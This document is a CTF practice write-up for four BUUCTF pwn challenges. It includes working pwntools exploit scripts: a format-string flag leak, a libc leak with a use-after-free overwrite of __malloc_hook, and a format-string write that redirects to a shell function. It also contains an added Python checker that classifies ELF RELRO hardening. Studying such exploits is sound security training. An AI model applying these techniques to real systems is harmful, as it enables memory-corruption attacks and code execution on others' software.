PWN-PRACTICE-BUUCTF-28
- wustctf2020_name_your_dog
- judgement_mna_2016
- gyctf_2020_some_thing_interesting
- xman_2019_format
wustctf2020_name_your_dog
Partial RELRO, so the GOT is writable.
The scanf GOT entry sits 56 bytes before the Dogs array.
With index -7 the write lands on the scanf GOT entry, which is overwritten with the address of shell.
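The write-up's first observation (Partial RELRO, GOT writable) is exactly what a hardening check should catch before a binary ships: Full RELRO (a PT_GNU_RELRO segment plus immediate binding) has the loader resolve the GOT and make it read-only before main() runs, so an out-of-bounds index like the one above cannot redirect a later call. The following added example is not part of the original write-up; it implements the same classification rule checksec uses by parsing the ELF64 program headers and dynamic section directly with the standard library. It only handles little-endian ELF64 (an assumption of the example), and build_synthetic_elf produces constructed, non-loadable images so the check can be exercised offline.

```python
import struct
import sys

# ELF constants (values from the ELF ABI / glibc elf.h)
PT_DYNAMIC = 2
PT_GNU_RELRO = 0x6474E552
DT_NULL = 0
DT_BIND_NOW = 24
DT_FLAGS = 30
DT_FLAGS_1 = 0x6FFFFFFB
DF_BIND_NOW = 0x8
DF_1_NOW = 0x1

EHDR_FMT = "<16sHHIQQQIHHHHHH"   # ELF64 file header, little-endian (64 bytes)
PHDR_FMT = "<IIQQQQQQ"           # ELF64 program header (56 bytes)
DYN_FMT = "<qQ"                  # ELF64 dynamic entry (16 bytes)


def classify_relro(data: bytes) -> str:
    """Return 'No RELRO', 'Partial RELRO' or 'Full RELRO' for a little-endian ELF64 image.

    Same rule as checksec: a PT_GNU_RELRO segment gives Partial RELRO; Partial plus
    immediate binding (DT_BIND_NOW, DF_BIND_NOW or DF_1_NOW) gives Full RELRO,
    because the GOT is then resolved and remapped read-only before main() runs.
    """
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    if data[4] != 2 or data[5] != 1:
        raise ValueError("this example only handles little-endian ELF64")
    e_phoff = struct.unpack_from("<Q", data, 32)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    has_relro = False
    bind_now = False
    for i in range(e_phnum):
        p_type, _flags, p_offset, _va, _pa, p_filesz, _memsz, _align = struct.unpack_from(
            PHDR_FMT, data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_RELRO:
            has_relro = True
        elif p_type == PT_DYNAMIC:
            # Walk the dynamic section until DT_NULL looking for immediate-binding flags.
            for off in range(p_offset, p_offset + p_filesz, struct.calcsize(DYN_FMT)):
                d_tag, d_val = struct.unpack_from(DYN_FMT, data, off)
                if d_tag == DT_NULL:
                    break
                if (d_tag == DT_BIND_NOW
                        or (d_tag == DT_FLAGS and d_val & DF_BIND_NOW)
                        or (d_tag == DT_FLAGS_1 and d_val & DF_1_NOW)):
                    bind_now = True
    if not has_relro:
        return "No RELRO"
    return "Full RELRO" if bind_now else "Partial RELRO"


def build_synthetic_elf(relro: bool, bind_now: bool) -> bytes:
    """Constructed test input: a minimal ELF64 image holding only the headers this check reads.

    It is not loadable; it exists so the classifier can be exercised without a real binary.
    """
    entries = [(DT_FLAGS, DF_BIND_NOW)] if bind_now else []
    entries.append((DT_NULL, 0))
    dyn = b"".join(struct.pack(DYN_FMT, tag, val) for tag, val in entries)
    phnum = 2 if relro else 1
    dyn_off = 64 + phnum * struct.calcsize(PHDR_FMT)   # dynamic section right after the phdrs
    phdrs = struct.pack(PHDR_FMT, PT_DYNAMIC, 6, dyn_off, dyn_off, dyn_off, len(dyn), len(dyn), 8)
    if relro:
        phdrs += struct.pack(PHDR_FMT, PT_GNU_RELRO, 4, dyn_off, dyn_off, dyn_off, len(dyn), len(dyn), 1)
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8)   # ELFCLASS64, little-endian, EV_CURRENT
    ehdr = struct.pack(EHDR_FMT, ident, 3, 62, 1, 0, 64, 0, 0, 64,
                       struct.calcsize(PHDR_FMT), phnum, 64, 0, 0)
    return ehdr + phdrs + dyn


def check_file(path: str) -> str:
    """Classify a real ELF64 file on disk."""
    with open(path, "rb") as f:
        return classify_relro(f.read())


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for p in sys.argv[1:]:
            print(p, check_file(p))
    else:
        # No argument: demonstrate on the three constructed images.
        for relro, now in ((False, False), (True, False), (True, True)):
            print("relro=%s bind_now=%s -> %s" % (relro, now, classify_relro(build_synthetic_elf(relro, now))))
```

Run it as `python3 relro_check.py ./wustctf2020_name_your_dog` (or any ELF64 binary) to see which of the three states it is in; anything short of Full RELRO means the GOT stays writable at runtime, which is the condition the write-up relies on. Linking with `-Wl,-z,relro,-z,now` is what moves a binary to Full RELRO.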
judgement_mna_2016
Format string vulnerability. The flag lies on the stack at offset 28, so "%28$s" prints it directly.
```python
from pwn import *

#io=process("./judgement_mna_2016")
io=remote("node4.buuoj.cn",25668)
io.recvuntil("Flag judgment system\nInput flag >> ")
flag_addr=0x0804A0A0   # address of the flag buffer (not needed once the stack offset is known)
payload="%28$s"        # the flag pointer is the 28th format argument
io.sendline(payload)
io.interactive()
```

gyctf_2020_some_thing_interesting
Format string + UAF. Reference: [BUUCTF]PWN——gyctf_2020_some_thing_interesting(格式化字符串+UAF)
```python
# -*- coding:utf-8 -*-
from pwn import *

#io=process("./gyctf_2020_some_thing_interesting")
io=remote("node4.buuoj.cn",25715)
elf=ELF("./gyctf_2020_some_thing_interesting")
libc=ELF("./libc-2.23-16-x64.so")

def check():
    # menu option 0: format string vulnerability
    io.sendlineafter("> Now please tell me what you want to do :","0")

def add(O_len,O_content,RE_len,RE_content):
    io.sendlineafter("> Now please tell me what you want to do :","1")
    io.sendlineafter("> O's length : ",str(O_len))
    io.sendlineafter("> O : ",O_content)
    io.sendlineafter("> RE's length : ",str(RE_len))
    io.sendlineafter("> RE : ",RE_content)

def edit(index,O_content,RE_content):
    io.sendlineafter("> Now please tell me what you want to do :","2")
    io.sendlineafter("> Oreo ID : ",str(index))
    io.sendlineafter("> O : ",O_content)
    io.sendlineafter("> RE : ",RE_content)

def free(index):
    # menu option 3: UAF (the freed chunk stays editable)
    io.sendlineafter("> Now please tell me what you want to do :","3")
    io.sendlineafter("> Oreo ID : ",str(index))

def show(index):
    io.sendlineafter("> Now please tell me what you want to do :","4")
    io.sendlineafter("> Oreo ID : ",str(index))

def exit():
    io.sendlineafter("> Now please tell me what you want to do :","5")

#gdb.attach(io)
#pause()
code="OreOOrereOOreO"
#len_code=14
payload=code+"%17$p"
io.sendlineafter("> Input your code please:",payload)
check()
io.recvuntil("# Your Code is "+code+"0x")
__libc_start_main=int(io.recvuntil("\n")[:-1],16)-240
libc_base=__libc_start_main-libc.sym["__libc_start_main"]
print("libc_base=="+hex(libc_base))
malloc_hook=libc_base+libc.sym["__malloc_hook"]
ones=[0x45216,0x4526a,0xf02a4,0xf1147]
onegadget=libc_base+ones[3]
#pause()
add(0x68,"aaaa",0x68,"bbbb")
free(1)
#pause()
edit(1,p64(0),p64(malloc_hook-0x23))
#pause()
payload="d"*0x13+p64(onegadget)
add(0x68,"cccc",0x68,payload)
#pause()
io.sendlineafter("> Now please tell me what you want to do :","1")
io.sendlineafter("> O's length : ",str(0x10))
io.interactive()
```

xman_2019_format
Format string vulnerability with the buffer on the heap. Reference: BUU-xman_2019_format-WP
```python
# -*- coding:utf-8 -*-
from pwn import *

#context.log_level="debug"
shell=0x080485AB
io=remote("node4.buuoj.cn",29724)
#io=process("./xman_2019_format")
addr=0x9c
# first write: one byte via %10$hhn, then a second write of the low 16 bits of shell via %18$hn
payload="%"+str(addr)+"c%10$hhn"+"|"
payload+="%"+str(shell&0xffff)+"c%18$hn"
io.sendline(payload)
io.sendline("cat flag")
io.interactive()
```